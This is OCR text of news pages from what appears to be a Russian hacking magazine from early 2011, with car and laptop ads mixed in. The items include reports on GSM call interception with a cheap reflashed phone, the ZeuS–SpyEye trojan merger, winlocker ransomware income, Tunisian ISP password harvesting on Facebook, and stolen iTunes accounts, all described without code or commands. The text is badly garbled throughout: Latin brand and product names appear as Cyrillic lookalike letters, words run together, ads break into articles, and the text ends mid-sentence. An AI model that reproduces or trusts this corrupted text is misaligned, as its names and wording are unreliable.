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— Папа, что такое некомпетентность и равнодушие? 

— Незнаю, сынок, мне пофигу. 

Некомпетентность и равнодушие — два порока, которые 
не несутничего хорошего ни пораженным людям, ни их 
окружению. Нет ничего хуже некомпетентных действий от 
человека, которому принято доверять, и решения кото- 
рого подразумевают ответственность. Некомпетентность 
никогда не приходит одна: ведь нормальный человек, 
ощущающий ответственность за результат, просто не смо- 
жетсимулировать квалифицированную работу. Истинная 
некомпетентность под силутолько равнодушным людям. 

Некомпетентный врач, некомпетентный строитель, не- 
компетентный дизайнер, некомпетентный программист. 
На каждую профессию найдутся толпы «специалистов», 
готовых оказать услугу, но из каждой толпы толь ко пара 
человекбудутпрофессионально пригодными. В нашей 
стобой отрасли, в ІТ, эта ситуация даже пожестче, чем в 
строительстве и отечественной медицине. 

Как-то раз ко мне обратились друзья, создававшие втот 
момент стартап — каталогопределенныхтоваров. Весе- 
лый фрилансер сделал им сайт, но по какой-то причине 
система работала крайне медленно даже на тестовой 



посещаемости — 1 посетитель в час. Мне стало крайне 
интересно, в чемже дело, и я решил покопаться в сорцах, 
изучить структуру БД. 

Вполне ожидаемо, что внутри оказались фаршеподоб- 
ные таблицы шириной в 1 20 составных полей с типа- 
ми ѵагсбаг(20) для целочисленных идентификаторов, 
смешанный в нечитаемое говно монолитный слиток из 
кода, данных и разметки, а также три десятка других ярких 
артефактов программистской несостоятельности. Удиви- 
тельно, что человек, считающий себя профессионалом 
и даже имеющий «высшее техническое образование», 
никогда не слышал ни о нормальныхформах, ни о процес- 
се проектирования БД, ни о концепции разделения кода, 
данных и интерфейса. 

Желаю тебе главного — уметь признавать свои ошибки, 
безболезненноучиться новому, стремиться быть компе- 
тентным и неравнодушным профессионалом. Верю, чтоХ 
тебе в этом поможет :). 
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ЕЩЕ ОДИН СПОСОБ «СЛУШАТЬ» 65М 



О взломах 65М-сетей (в частности, алгоритмов шифрования), мы уже 
писали неоднократно (например, о системе Кгакеп, способной вскрыть 
А5/1). Также мы рассказывали отом, что сам взлом, на который ранее 
требовалось продолжительное время, теперь стал осуществим за 
минуту-другую. Вся проблема заключаласьлишь в подборе и покупке 
аппаратуры — задача это непростая и совсем не дешевая (речьидето 
тысячах вечнозеленых денег). ѲЗМ-операторы от проблемы тогда пред- 
почли отмахнуться — мол, слишком все это сложно, дорого и трудоемко. 
И, каквсегда, оказалисьнеправы. Недавно на конференции Сбаоз 
СотриІегСІиЬ Сопдгезз было продемонстрировано, что для перехвата 
ѲЗМ-переговоров вполне достаточно связки « ноутбук-сотов ый», притом 
в качестве телефона может выступать самая примитивная модель 
«Моторолы»за $15. Уязвимость ѲЗМ-сетей в очередной раз доказали 
исследователь из Зесигііу РезеагсЬ І_аЬз Карстен Нол и программист 
Сильвен Мюно, участвующий в проекте по созданию свободной 65М- 
прошивки ОзппосотВВ. Для взлома им понадобился л ишь собствен- 
норучно перепрошитый ѲМЗ-телефон «Моторола», подключенный 
к ноутбуку с набором открытого ПО. Сам метод взлома таков: жертве 
отправляется поврежденное или пустое ЗМЗ-сообщение, которое 
никакие отображается на телефоне получателя. Затем, путем снифинга, 
выявляется случайный идентификатор сессии. Снифер как раз создан 
на базе модифицированной «Моторолы»за пятнадцать баксов — за счет 
перепрошивки аппарат получает куда больше данных от сотовой сети, 
чем обычныйтелефон, и практически в реальном времени сливаетвсе 



это в компьютер (канал подключения тоже немного оптимизирован). 
Послетого, как нужный поток выявлен, остается лишь решить вопрос его 
расшифровки. Здесь в игру вступает один из багов Ѳ5М-сетей: многие 
операторы до сих пор не удосужились ввести защиту, которая заменяла 
бы нулевые заполняющие биты в проверочных пакетах на случайные 
значения. А пока такой защиты нет, содержание этих пустых сообщений 
легко предсказуемо. Само вскрытие 64-битного ключа шифрования 
происходит при помощи двухтерабайтной «радужной таблицы», собран- 
ной энтузиастами. Занимаетэто около двадцати секунд. Ввидутого, что 
большинство операторов (опять же, пренебрегая безопасностью), долго 
используют один итотже сессионный ключ какдля голосовых соедине- 
ний, таки СМС-сообщений, перехваченную последовательность можно 
применить и для расшифровки последующихтелефонныхзвонков 
жертвы. Подробности доклада и полезные материалы можно найти на 
официальном сайте конференции: еѵепіъ.ссс.сіе . 





100 млн пользователей используют для обмена файлами сети ЕШоггепІ, 
если верить официальному пресс-релизу компании. 



2ЕІІЗ + 5РѴЕѴЕ = ? 




Еще недавно инструментарии ІеиЗ и ЗруЕуе были непримиримыми конкурентами, 
беспощадно уничтожавшими детища друг друга на зараженных машинах, а теперь 
они объединились. Специалисты в области информационной безопасности уже бьют 
тревогу, ведь новая сборка ЗруЕуе вобрала в себя все «лучшие» черты обоихтулкитов, 
являя собой действительно чудовищный гибрид. Что послужило поводом ктакому 
слиянию, доподлинно, разумеется, не известно, хотя андеграунд и полнится слухами 
отом, что автор «Зевса» решил уйти на покой и оставил все свои наработки наиболее 
достойному преемнику — создателю ЗруЕуе, известному какОгіЬосІетоп/НагсІегтап. 
Как бы то ни было, результат впечатляет. Новая версия сохранила интерфейс ЗруЕуе, 
но обросла функционалом ЕеиЗ. Главные фишки новой сборки: поддержка раз- 
личных плагинов и опция обхода системы безопасности Тгизіеег Раррогі, которой 
пользуются многие банки. Также улучшили функцию извлечения паролей, добавили 
уведомление через 5аЬЬег, включили модуль ѴІ\ІС, а также функции автоматического 
распространения и обновления. Упомянутые выше плагины, позволяют снабжать 
жертв фейковыми страницами и упрощают атаки против пользователей РігеГох. Если 
раньше ЗруЕуе воровал данные из зашифрован ного хранил ища ѴѴіпсІоѵѵз, то теперь, 
благодаря плагину ^сегід га ЬЬег, он способен пролезть и в папки, где свои данные 
хранит «Лиса». Гибрид двух тул китов уже вовсю продается на черном рынке, и, по 
данным специалистов Тгепб Місго, пара серверовуже использует новую версию 
малвари. Похоже, можно ждать появления новых крупных ботнетов. 
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МЕ6АЫЕѴѴ5 



КАДРОВЫЕ 

ПЕРЕСТАНОВКИ 

Сразу две крупные ІТ-компании объявили об изменениях в 
высшем руководящем составе. Первой стала Арріе, чей генераль- 
ный директор Стив Джобс взял бессрочный отпуск по состоянию 
здоровья. Напомним, что в 2009 годуДжобсуже провел на боль- 
ничном полгода, так как лечился от рака поджелудочной железы 
и перенес пересадку печени. Не хочется думать о худшем, но 
очевидно, что победить заболевание окончательно Стиву тогда не 
удалось, с чем и связан его нынешний отпуск. 

В официальном обращении Джобс заверил, что продолжит зани- 
мать пост генерального директора и будетучаствовать в принятии 
основных стратегических решений. Временным управляющим 
станет операционный директор Арріе Тим Кук, уже подменявший 
Джобса в 2009. 

У компании Ѳоодіе тоже сменится руководитель, только не 
временно, а постоянно. Пост генерального директора в скором 
времени займет один из основателей поискового гиганта — 
Ларри Пейдж. Эрик Шмидт, занимавший директорское кресло с 
2001 года, из Соодіе тоже уходить не собирается — он останется 
в компании в качестве председателя правления, а также будет 
советником Пейджа и Брина. 




» Средняя цена ворованной банковской карты на черном рынке, по 
данным Рапба І_аЬ$, составляет порядка $2. За $80 можно получить 
подробности о средствах на счету. В случае, если сумма средств превышает 
$82 000, заплатить за такую «детализацию» придется уже $700. 



ВИРУСЫ -ПРИБЫЛЬНЫЙ 
БИЗНЕС 




Компания Тгепб Місго опубликовала интересные 
данные, полученные в ходе исследования деятель- 
ности троя ѴѴОРМ_РІХОВОТ.А (он же ТВ0Э_КАЫ50М. 
СЮѴѴА). Упомянутый зловред сам по себе не особенно 
интересен, он относится к классу винлокеров и рас- 
пространяется в основном через порносайты. Зараза 
весьма «популярна» на территории России —только за 
декабрь2010 года вирьбыл скачан порядка 137 000 раз. 
Интересно другое: изучая деятельность зловреда, спе- 
циалисты Тгепб Місго сумели получить доступ кодному 
из координационных серверов злоумышленников. На 
сервер стекалась информация о поступлениях средств 
на шестьдесяттелефонных номеров, предназначенных 
специально для сбора «подати» сжертв. После анализа 
данных выяснилось, что только за последние пять не- 
дель 5М5 на указанные в блокировщике номера отпра- 
вили более 2 500 человек, то есть почти 2% владельцев 
зараженных ПК. Учитывая, что стоимость одной такой 
БМЭ’ки составляла 360 рублей, несложно подсчитать, 
что за месяц с небольшим мошенники стали богаче на 
901 245 рублей ($29.5 тыс.). Продолжая арифметику, 
вычисляем, что годовой доход преступников, специали- 
зирующихся на винлокерах, почти достигает отметки в 
1 00 000 000 рублей. Интересно, после этих цифр кого-то 
еще удивляет популярность винлокеров итотфакт, что 
их пишут все более профессионально и серьезно? 
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НОВЫЙ №№1111 8АИ0ЕН0 8ТЕРШАѴ 

ТВОЙ АВТОМОБИЛЬ. ТВОЯ СВОБОДА 





ѵѵѵѵѵѵ.гепаиіі.ги 



НОВЫЙ КЕМШ.Т 8АМ0ЕВ0 8ТЕРШАѴ — это ваша свобода от скучных компромиссов 
и надоевших условностей. 

• Увеличенный до 175 мм клиренс 

• Кондиционер, подогрев передних сидений, АВ$, 2 подушки безопасности, окраска металлик, 
литые диски 15" 

• Гарантия — 3 года или 100 000 км пробега 1 КепаиІІ рекомендует 

• 445 000 рублей 

• Новое предложение от КЕИАІЛТ СгесШ — страховая защита платежей по кредиту 2 



йШѴЕ ТНЕ СИАМЕ 



И 

ИЕ1МА1ЛТ 



'Действие гарантии заканчивается после 3 лет эксплуатации автомобиля или после достижения 100 000 км пробега, в зависимости от того, что наступит раньше. 
2 3а счет субсидирования кредитной программы производителем размер ежемесячных выплат по кредиту покупателем сопоставим с кредитными выплатами Банку по ставке 
0% в рублях. Условия кредитования: первоначальный взнос — от 30%, срок — от 3 до 12 месяцев, ставка Банка в кредитном договоре — 12%. В период действия 
государственной программы льготного автокредитования ставка Банка в кредитном договоре может быть изменена, она рассчитывается как разница между ставкой 
Банка и 2/3 ставки рефинансирования Банка России, действующей на дату предоставления кредита. Комиссия за оформление первого кредита — 6000 р. 
(при последующих кредитах не взимается). Досрочное погашение: до истечения 3 месяцев не допускается, по истечении 3 месяцев — без взимания дополнительных платежей. Заемщик обязан застраховать автомобиль по полисам 
КАСКО и ОСАГО. Неустойка за несвоевременное погашение задолженности по кредиту — 0,5% за каждый календарный день от суммы просроченной задолженности. Кредит погашается ежемесячно равными (аннуитетными) 
платежами. Предложение действительно до 31 марта 2011 г. для автомобилей ВепаиІІ Запбего Зіерѵѵау. Кредитование осуществляет ЗАО ЮниКредит Банк (Генеральная лицензия №1 Банка России). Услуги страхования по программе 
страхования Защита платежей предоставляются ЗАО «АЛИКО» и ЗАСО «ЭРГО Русь». Оформление программы страхования не является обязательным условием выдачи кредита. Дополнительную информацию по предложению 
вы можете получить по телефону 8-800-700-79-97 (звонок по России бесплатный) или на ѵѵѵѵѵѵ.гепаиіі.ги. Условия предложения могут быть изменены в случае изменения ставки рефинансирования Банка России. Условия и тарифы 
действительны на 01.02.2011 г. и могут быть изменены Банком в одностороннем порядке. *Управляй переменами. Реклама. 



ВЕ№ІЛТ СКЕОІТ і 




МЕ6АЫЕѴѴ5 



ИНФОРМАЦИОННЫЕ 
ВОИНЫ. РАСЕВООК. 



Еслиты ничего не слышал о нынешней политической ситуации в 
Тунисе, сообщаем —ты пропустил так называемую «жасминовую 
революцию», а говоря проще — государственный переворот. Но любая 
современная война была бы неполной без своей информационной со- 
ставляющей. Спецслужбы Туниса решили объявить войну социальной 
сети РасеЬоок, через которую оппозиция распространяла «неугодные» 
власти видеоролики, проводила организацию митингов и такдалее. 
ѲтаіІи ѴаЬоотакже попали под раздачу, но история, приключивша- 
яся вокруг РасеЬоок, интереснее. Спецслужбы страны на уровне ІБР 
внедрили ^ѵаБсгірІ, который при обращении купомянутым ресур- 
сам принудительно менял соединение НТТР5 на НТТР и добавлял 
к страницам десять строк кода. Таким образом осуществлялся сбор 
логинов и паролей пользователей (кстати, поговаривают, что он мог 
начаться еще летом 2010, когда провайдер-монополиствпервые 
перекрыл тунисцам доступ кНТТРБ). Получив данныедля авториза- 
ции, скриптшифровал их и помещал в II РЦ добавляя пять случайных 
символов. Затем данные перехватывались на уровне национального 
ІБР Что сделали спецслужбы с полученной информацией? Все просто, 
они принялись пачками удалять «опасные» аккаунты оппозиционе- 
ров. Однако оказалось, что служба безопасности РасеЬооктоже не 
дремлет. Еще в конце декабря директор по безопасности РасеЬоок 
Джо Салливан обратил внимание на странныежалобы, поступающие 
изТуниса, и поручил своей команде разобраться. Пришлось пово- 




зиться, зато к5-му января стало ясно, что ситуация совершенно дикая 
— скомпрометированными оказались пароли всех пользователей 
Тунисской республики, и спецслужбы действительнотрутаккаунты! 
Другая компания, возможно, не стала бы встревать в эти политические 
дрязги, но в РасеЬоок приняли решение отнестись к проблеме как 
кчисто технической. И, по сути, социальная сеть вступила в войнус 
пусть и небольшим, но целым государством! Вдохновившись статьями 
Клэя Ширки и Евгения Морозова, которые детально описывали мето- 
ды спецслужб, безопасники РасеЬоок взялись придумывать ответные 
меры. 1 0-го января для всех пользователей Туниса была включена 
новая двухуровневая система защиты: все запросы из Тунисской Рес- 
публики теперь перенаправлялись на НТТРБ-сервер (вообще-то ІБР 
может принудительно переводить сессию в НТТР, но этого отчего-то не 
произошло), а также запустили процедуру дополнительной аутенти- 
фикации. Теперь, перед тем как впустить пользователя на сайт, ему 
предлагаютузнать нескольких своих друзей по фотографиям. Как ни 
странно, такие нехитрые меры пока помогают, а тунисцы благодарят 
РасеЬоок и Марка Цукерберга за поддержку. 



» 



51,8% девайсов на АпсІгоісІ работают под управлением версии 2.2 
мобильной ОС от боодіе. При этом на самом последнем релизе - 2.3 - 



всего 0.4% смартфонов. 



ВИДЕО БЕЗ ПРОВОДОВ 



Мыуже не разупоминали отом, что широкое 
распространение беспроводной передачи 
видео — дело недалекого будущего. Уже сейчас 
существуют различные (конкурирующие, кстати) 
технологии, позволяющие передавать«картинку 
по воздуху», например ѴѴігеІеззРЮ, ѴѴРЮІ и ѴѴЮі. 
Однако до последнего времени рынок 
предлагал нам разве что различные ѴѴігеІезз 
ЫБВ-девайсы, да новые ноутбуки, плееры и 
телевизоры со встроенными передатчиками- 
прием никам и упомянутых выше стандартов. 
Еслиты неулавливаешь, кчемуя веду, поясню 
— решений для десктопов попросту не было. 
Если, конечно, не считать II 5 В -устройств, 
которые далеко не идеальны и ктомуже 
заметно бьют по карману. Теперьтакой гаджет 
есть — это видеокарта КРА2 ІЧѴЮІАѲеРогсе 
ОТХ460 ѴѴРЮІ. Фактически, это первая видюха 
для десктопов, построенная на технологии 
ѴѴРЮІ (ѴѴігеІезз Ноте Оідііаі ІпІеНасе). Если в 
твоем мониторе нетвстроенного приемника 
ѴѴРЮІ-сигнала (аутебя его нет, правда?), не 
отчаивайся. Хорошая новость заключается 
в том, что он поставляется в комплекте с 
видеокартой. Радиус действ и я сигнала ѴѴРЮІ 



составляет порядка тридцати метров (и стены 
ему не помеха!), наличествует поддержка РиІІРЮ 
(1 080р). Крометого, стоитсказать, чтоѲеРогсе 
6ТХ460 ѴѴРЮІ — это еще и 1 Гб памяти ОРОРбс 
256-битным интерфейсом, что явно придется по 
душе приложениям, использующимтехно- 
логию СІЮ А. А чего стоят пять здоровенных 



антенн, которые торчат из видюхи — это просто 
праздник какой-то! :) В продажу необычная 
новинка должна поступить в самое ближайшее 
время. Цена устройства до сих пор неизвестна. 
Впрочем, можно подключить к делулогику и 
предположить, что дешевым это удовольствие 
окажется в ряд л и. 
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ѴѴіпсІоѵѵз®. Жизнь без преград. АЗІІЗ рекомендует ОС ѴѴіпсІоѵѵз 7. 



Ноутбуки А5ІІ5 серии N 

ПОЧУВСТВУЙ МОЩЬ ЖИВОГО ЗВУКА 




Используя эксклюзивную технологию ЗопісМазІег, разработанную в сотрудниче- 
стве со специалистами фирмы Вапд & ОІиТзеп ІСЕроѵѵег®, ноутбук АЗЫЗ N73^, 
оснащенный процессором ІпіеІ® Соге™ іб и подлинной операционной системой 
ѴѴіпсІоѵѵз® 7 Домашняя расширенная, обеспечивает четкий, насыщенный, глубо- 
кий звук, который нельзя было услышать раньше ни на каком ином мобильном 
компьютере. Помимо выдающейся аудиосистемы в этом ноутбуке реализована 
технология Зирег НуЬгісі Епдіпе, которая увеличивает производительность на 
7 процентов*, современный интерфейс ІІЗВ 3.0 и функция Ѵісіео Мадіс, увеличи- 
вающая качество стандартных видеоматериалов до уровня РиІІ-НЮ 1080р. Ноут- 
буки АЗІІЗ серии N с аудиосистемой ЗопісМазІег подарят вам совершенно новые 
ощущения! 



* Зависит от конфигурации. 




ѵѵѵѵѵѵ.азиз.ги 

ѵѵѵѵѵѵ.азизпЬ.ги 

Всемирная гарантия 2 года Горячая линия АЗІІЗ: (495) 23-11-999, 8-800-100-2787 

Информацию о том, где купить ноутбуки А51І5 можно найти на сайте ѵѵѵѵѵѵ.азизпЬ.ги 

ІпіеІ, логотип ІпіеІ, ІпіеІ Іпзісіе, ІпіеІ Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 

Товар сертифицирован, на правах рекламы. 




Быстрее. 

Умнее. 
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«ВКОНТАКТЕ» НАШЛИ 
ПИРАТА 



Почти каждый раз, когда до нас доходят известия об очередных раз- 
бирательствах на почве сетевого пиратства, мы с сарказмом совету- 
ем нашим борцам за «авторское лево» заглянуть в социальные сети 
иудивиться количеству нелегального контента. То ли наши ехидные 
комментарии былиуслышаны.толи идеи просто витаютв воздухе... 
Словом, получите и распишитесь — первый прецедент. Против юзера 
«ВКонтакте» возбудили уголовное дело за размещение музыки на 
странице. Теперь 26-летнему москвичу грозит шесть леттюрьмы (ст. 
146 Уголовного кодекса РФ — нарушение авторских и смежных прав). 
В отделе «К» сообщают, что пользователем они заинтересовались 
после обращения в милицию представителя ООО «Фирма грамза- 
писи «Никитин». Фирма была крайне недовольна тем, что аудио- 
материалы, исключительные права на которые принадлежатей, 
спокойно и — оужас! — бесплатно распространяются по «ВКонтак- 
те». Наиболее злостным нарушителем оказался тот самый 26-летний 
житель столицы, разместивший у себя на странице восемнадцать 
аудиозаписей некой российской музыкальной группы (название не 
разглашается), число окачиваний которых превысило 200 000. Также 




МВД называет суммуущерба — правообладатель якобы понесущерб 
в виде недополученной выгоды в размере 1 08 000 рублей. Странное 
число, было бы очень интересноузнать, каким образом оно получе- 
но. Подводя неутешительный итог, нужно заметить, что хотя у нас и 
не прецедентное право, пример «Фирмы грамзаписи «Никитин» все 
равно может понравиться другим правообладателям, и последуют 
новые обращения в органы и новыеуголовные дела. 




80 новых планшетных устройств были представлены на ежегодной 
выставке СЕ5 2011, прошедшей в Лас-Вегасе. 



СВЕРХТОНКИЙ МОНИТОР 



Чем компактнее монитор, тем больше места 
будет на столе — это понятно любому. Произ- 
водители железа ведут настоящий невиди- 
мый бой, стремясь сделать свои мониторы 
еще легче, тоньше и уже. Серьезную заявку на 
победу в этом соревновании сделала компа- 
ния І_6, представив ультратон кий І_ЕО-мони- 
тор Е90 с диагональю 21 .5». Отличает новинку, 
в первую очередь, глубина корпуса, которая 
составляет всего 7.2 мм! Также устройство 
может похвастаться малым весом, экономич- 



ным энергопотреблением (на 40% меньше, 
чем обычныеЖК-мониторы с подсветкой 
ССЕІ_) и оригинальным хромированным 
корпусом. За счет последнего Е90 смотрится 
совсем воздушным и изящным. Все разъемы 
( 0-511 Ь, ОѴІ-й, ЕЮМІ) спрятаны в задней части 
подставки благодаря системе удобного под- 
ключения Е2-саЫіпд. Радуют характеристики 
экрана: время отклика матрицы составляет2 
мс, разрешение — 1920x1080. Рекомендован- 
ная цена для данной модели — 13 000 рублей. 



БЕСПРОВОДНАЯ ЗАРЯДКА ДЛЯ ВСЕГО 



На уже упомянутой выше выставке СЕ5 любопытную разработку 
представила компания еСоирІеб. Специалисты еСоирІеб утверждают 
(а независимые эксперты подтверждают), что им удалось создать 
беспроводные зарядные устройства 90% эффективности — то есть 
при передаче сигнала теряется всего 10% энергии. Это очень круто 
в сравнении со сходными продуктами конкурентов и практически 
аналогично обычной «проводной»зарядке. Предполагается, что 
заряжать от та кой станции с равным успехом можно как мобильный 
телефон, так и электромобиль, что и было продемонстрировано 
публике на примереТезІа Поабзіег. По словам представителей 
еСоирІесІ, чтобы любой девайс стал совместим с ихзарядной стан- 
цией, достаточно установить в него специальную катушку (так как 
в основетехнологии лежитэлектромагнитная индукция). По цене 
такой приемник вполне сопоставим с установкой других зарядных 
решений. 





► ОІО 
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АРР ЗТОКЕ - ТЕПЕРЬ И ДЛЯ «МАКОВ» 




На радость всех «яблочников» компания Арріе запустила 
сервис Мае Арр Зіоге даже раньше запланированного 
срока. 

Теперьу пользователей «Макинтошей» появился собс- 
твенный аналогАрр Зіоге (который работает для іРЬопе, 
іРосІ ІоисЬ и іРасІ), позволяющий максимальноудобно 
устанавливать как платные, так и бесплатные приложения 
для Мае 05. 

Все реализовано в лучшихтрадициях Арр Зіоге: покупка 
одним нажатием, прозрачная установка приложения, 
удобная система обновлений. К пользовательскому 
аккаунту іТипез привязывается пластиковая карточка, 
с которой и будутсписаны деньги за приобретенные 
приложения. Сейчас в Мае Арр Зіоге уже болеетысячи 
программ, и их число постоянно растет. Система работает 
на машинахсустановленной МасОЗХЗпоѵѵ І_еорап± 
Вотсмотришь на реализацию магазина для Мае или 
менеджеры пакетов для І_іпих и думаешь: «Удивительное 
дело, какже МісгозоИ до сих пор не реализовала ничего 
подобного?». Вроде бытакая сама собой напрашиваю- 
щаяся штука, ан нет — ничего подобного не существует. 
Слабо? 




Из 107 трлн, писем, отправленных за год, 89,1% были спамом (данные 
компании Ріпдсіот). 



Н0ТМАИ «ПОТЕРЯЛ» КУНУ 



КОРРЕСПОНДЕНЦИИ 



Оригинальный «подарок» к Новому году сделал своим пользователям 
почтовый сервис ѴѴіпсІоѵѵз Ыѵе НоІтаіІотМісгозоИ. Да, возможно™ 
удивишься, но Ноітаіі в наши дни пользуются нетолько спамеры, но 
итысячи живыхлюдей поту сторону Атлантики (вообще, это популяр- 
нейший почтовый сервис на планете). Залогинившись в свои аккаунты 
после праздников, эти самыеживые люди судивлением обнаружили 
пустоту. Все папки оказались девственно чисты, корреспонденция 
за многие годы исчезла, лишь во «Входящих», будто издевка, висело 
первое приветственное письмо от Ноіппаіі. На сап порт ѴѴіпсІоѵѵз І_іѵе 
обрушился шквал жалоб: уже на следующий день после инцидента на 
официальном форуме этому вопросу были посвящены сотни страниц. 
Тем удивительнее звучитзаявление Кэтрин Брукер, сделанное чуть 
позже. Официальная представительница МісгозоИ сообщила, что с 
проблемой столкнулось «лишь незначительное число пользователей», 
не дала никаких конкретныхобъяснений случившегося итуманно 
высказалась, что «компания работает над устранением неполадок». 
Сейчас, по прошествии времени, становится ясно, что «устранение 
неполадок» заключалось в лучшем случае в предотвращении анало- 
гичного сбоя в будущем, а возвращать исчезнувшие письма пользова- 
телям явно никто не собирается. Лишний повод вспомнить о необходи- 
мости регулярно делать бэкапы. 
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МЕ6АЫЕѴѴ5 



ДВУХЪЯДЕ 

СМАРТФОН 

СИСТЕМНЬ 



РНЫИ 

ЗАМЕНЯЕТ 
И БЛОК 



Ежегодная выставка СЕЗІСопзитегЕІесІгопісБЗЬоѵѵ), прошедшая в 
Лос-Анджелесе в начале января, какобычно принесла информациюо 
множестве новых гаджетов. На наш взгляд, настоящим «гвоздем про- 
граммы»стал продемонстрированный там смартфон Моіогоіа Аігіх46, 
такчтоо нем мы решили рассказать подробнее. Специалисты Моіогоіа 
создали оригинальный многофункциональный девайс, окрестив его 
«модульным сотовым телефоном». Весь фокус в том, что этотандройд- 
аппаратлегким движением руки превращается в полноценный ПК. Во- 
первых, Аігіх 46 можно либо подключить к любому НОМ І-совместимому 
телевизору или монитору, присоединить к нему ІІБВ-мышь и клавиатуру 
(все через миниатюрную док-станцию), и получить вполне пригодный 
для офисной работы ПКили приставку. Во-вторых, можно прикупить 
док-станцию в виде «пустого» ноутбука — экран 1 1 .6», клавиатура, 
батарея и разъем для подключения смартфона, спрятанный за экраном. 
Какты понимаешь, во втором случае достаточно присоединить аппарат 
к«ноутбуку» и опять-таки полноценный компьютер готов к работе. Тебе 
уже интересно, чтоуАігіх40 внутри? Отвечаем: Моіогоіа Аігіх46 — это, 
посути, самый мощный смартфон натекущий момент. Этотнебольшой 
с виду девайс с 4-дюймовым сенсорным дисплеем (960x540 пикселей) 
построен на базе двухъядерной платформы ІМѴЮІАТедга 2 и оснащен 
1 Гбоперативной памяти. Пока устройство управляется ОС АпбгоісІ 2.2, 
но к моменту начала продажобещают версию 2.3. Крометого, новинка 




комплектуется очень емким аккумулятором 1930 мАч, которого будет 
хватать на 9 часов в режиме разговора, и при этом весит всего 1 36 г. 
Конечно, не обошлось без встроенной камеры (5 Мп со светодиодной 
вспышкой), фронтальной ѴОА-камеры для видеосвязи, поддержки 
ѴѴі-Еі 802.1 1 Ь/д/п, Віиеіооіб, 6Р5, слота для тісгоЗО карт итак дал ее. 
Какова будет цена этого маленького монстра, и когда ста рту ют продажи, 
пока не известно. Можно предположить, что в России, ввиду отсутствия 
официального представительства Моіо го Іа, устройств о появится не 
очень скоро, а по цене будет равняться полноценномулэптопу. 




10 лет исполнилось 



30 ДЛЯ ВЗРОСЛЫХ 



Цитата из мюзикла «Аѵепие О», гласящая: 
«Іпіегпеі із к>г рогп» (Интернет предназна- 
чен для порно), давно уже стала нарица- 
тельным. Самое забавное заключается в 
том, что в этой фразе есть немалая доля ис- 
тины — сфера услуг и товаров для взрослых 
и технологический прогресс действительно 
идут бок о бок. Они прекрасно дополняют 
и «продвигают» друг друга. Скажем, ты 
наверняка читал или слышал отом, что 
разного рода манипуляторы с эффектом 
обратного действия интересуют нетолько 
представителей игровой индустрии, но и 



ѴѴікіресІіа 15 января. Как быстро летит время. 



участников индустрии развлечений для 
взрослых. За примерами не нужно ходить 
далеко: практически сразу после выхода 
Кіпесі от Місгозоіі: умельцы стали предпри- 
нимать попытки адаптировать его для XXX- 
игр (кстати, успешно, что очень не нравится 
самим « мелко мягким»), А после прокатив- 
шегося по планете бума Зй-технологий на 
крупных порносайтах быстренько появи- 
лись разделы с Зй- контентом. Да, вообще- 
то, снимать порновЗйначали уже давно, 
но интереса ктехнологии до последнего 
времени практически не было. Теперь же, 



когда фильмы в Зй пользуются спросом как 
никогда, странно было бы его не использо- 
вать. Стало известно, что во втором квар- 
тале текущего года «Пентхаус» запустит 
первый в миретелеканал, транслирующий 
30-порно. Таким образом, у нас получается 
следующая картина: спортивные транс- 
ляции в режиме стерео уже практикуются, 
контент для взрослых — на подходе, а зна- 
чит, где-то на горизонте уже маячит смутная 
перспектива 30-телевидения в широком 
смысле этого слова. И, как всегда, порно 
выступает двигателем прогресса :). 



ѴѴШЗТОМ РРЕЕ00М МЫЗІС 

В декабре 2010 года в Москве состоялся финал регионального тура 
фестиваля ѴѴіпбіоп Егеебот МиБІс. Кардинально новый формат 
музыкальных мероприятий Зирег бат ЗеззіопБ, объединивший на 
одной сцене актуальные музыкальные направления и передовые циф- 
ровыетехнологии, собрал тысячи поклонников в пяти городах России. 
На московской сцене выступили хедлайнеры европейских клубов, 
втом числе легенда мирового брит-попа — группа КаізегСЫеіз, а 
также классики электронного жанра, обладатели бгатту и МТѴ Мизіс 
Аѵѵагбз, проект ОігІуѴедаз. 




► 012 
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СЕНСОРНАЯ МЫШЬ ОТ МІСК030ГТ 




Чуть больше года прошло стех пор, как компания 
Арріе выпустила минималистичную Мадіс Моизе. 
Множество людей за это время пристрастились к 
сенсорным «грызунам» и хотели бы, чтобы выбор 
этих девайсов был больше. Спешим порадовать: 
достойную новинку выпустил вечный кон куре нт Арріе 
— компания МісгозоТТ. Устройство, получившее имя 
ТоисЬ Моизе, лишено колеса прокрутки, зато оснаще- 
но сенсорной поверхностью или «матрицей емкост- 
ных электродов, чувствительных к прикосновению». 
Говоря проще: скроллить можно почти по всей повер- 
хности мышки. Для тех, кто еще неуспел поработать 
ссенсорными мышами, поясним —устройство спо- 
собно распознавать различныежесты, втом числе и с 



участием нескольких пальцев сразу. Таким способом 
реализованы команды перелистывания, изменения 
масштаба, панорамирования, навигации между 
окнами и так далее. Благодаря технологи и ВІиеТгаск 
новинка совершенно неприхотлива кповерхности, 
на которой используется. Высокая точность отслежи- 
вания перемещений мыши на разных поверхностях 
достигается благодаря новому источнику подсветки и 
опти чес ко му датчику. В комплектТоисб Моизе входит 
миниатюрный ІІ5В-ресивер5пар-іп Ыапо, функ- 
ционирующий на частоте 2.4 ГГц. Продажи мыши 
ста рту ют тол ькоэтимлетом.нопредварительный 
заказ в магазине Атагоп. сот можно оформить уже 
сейчас. Новинка обойдется тебе в $79.95. 



ІТІМ5-АККАУНТЫ ПО ДЕШЕВКЕ 



В прошлом году по Сети дол го циркулировали 
слухи обугоне большого количества аккаунтов 
іТипез, и в итоге Арріе были вынуждены их 
подтвердить. Тогда мы не знали, каков масштаб 
бедствия, и представители Арріе уверял и, что 
пользователей оповестили об опасности и 
предложили им сменить пароли. Теперьже на 
китайском сайте ТаоВао (барахолка вроде ЕЬау) 
в продаже всплыли 50 000 аккаунтов ІТипез по 



бросовым ценам. За один аккаунт хакеры хотят 
всего один юань, что примерно равно четыр- 
надцати центам. За эти деньги вполне честно 
обещаютвременный неограниченный доступ к 
муз ы ка л ь н о му ката л о гу Ар р Іе , а та кже к и гр а м , 
программам и фильмам (при несанкциониро- 
ванном входе может сработать система предуп- 
реждения, которая заблокирует доступ через 
двенадцать часов). Интересно, связаны ли эти 







М3 ДАРИТ ТЕЛЕФОНЫ ХАКЕРАМ 



Хакер, скрывающийся под ником ОеоНоІ, 
известен во всем мире благодаря взлому 
іРЬопе и РІауЗіаІіоп 3. И стоило ему написать 
у себя на сайте (деоЬоГсот) о намерении 
приобрести и сломать устройство на базе 
ѴѴіпсІоѵѵз РЬопе 7, какс нимтутже связались 
представители Місгозоіі. Если ты думаешь, 
что взломщику принялисьугрожать судеб- 
ными разбирательствами и страшными 
карами — ошибаешься. На связьсджей- 
